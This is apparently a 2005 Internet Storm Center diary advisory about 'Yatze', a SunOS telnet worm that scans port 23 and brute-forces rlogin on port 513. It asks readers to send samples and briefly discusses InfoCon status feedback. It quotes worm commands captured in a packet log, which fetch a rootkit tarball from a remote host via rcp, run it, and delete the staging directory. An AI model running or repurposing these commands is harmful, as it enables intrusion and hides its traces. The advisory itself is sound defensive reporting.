Yatze telnet worm; InfoCon update; rlogin link to telnet maybe?

Published: 2005-03-26
Last Updated: 2005-03-26 21:30:18 UTC
by donald smith (Version: 1)
0 comment(s)
SunOS telnet worm on the loose Watch ports 23, 513 and 514

The telnet port(23) is being targeted and rcp is the download port(514)

used to grab the worm/autorooter kit via rcp.

We have received several reports of what appears to be a telnet negotiation
exploit with autorooter or worm like qualities.

Further reports shows many of the hosts being reported for telnet scans

are also being reported for a rlogin bruteforce on port 513

It was reported that the probes for port 23 began on 03/20/2005

Looking at isc.sans.org shows 23 has been fairly active but the

number of targets had a large increase on 03/23/2005.

I pulled these commands from a user provide tcpdump file :

mkdir /tmp/.m ; cd /tmp/.m; echo /usr/bin/rcp
news@`/usr/bin/uname -m`.tar . >mrun.sh

echo /usr/bin/tar -xvf yatze-SunOS_`/usr/bin/uname -m`.tar >>mrun.sh

echo cd rk \; /bin/sh go >>mrun.sh

echo cd / \; rm -rf /tmp/.m/\* \; rm -rf /tmp/.m >>mrun.sh

/usr/bin/nohup /bin/sh mrun.sh >/dev/null 2>/dev/null &
We have not gotten a copy of the actual worm/autorooter yet

If you have a copy we would like to analysis it
I looked at mynetwatchman.com most of the port 23 "violators"

are also showing up for attempting to bruteforce guess the password

on port 513 (rlogin).

InfoCon Alert Status Calibration

We have received a lot of emails about our InfoCon Alert Status

since yesterdays diary requested your feedback/opinions of it.

We will review them and consider each suggestion.

Please keep submitting in your ideas via the contact page.
0 comment(s)


Diary Archives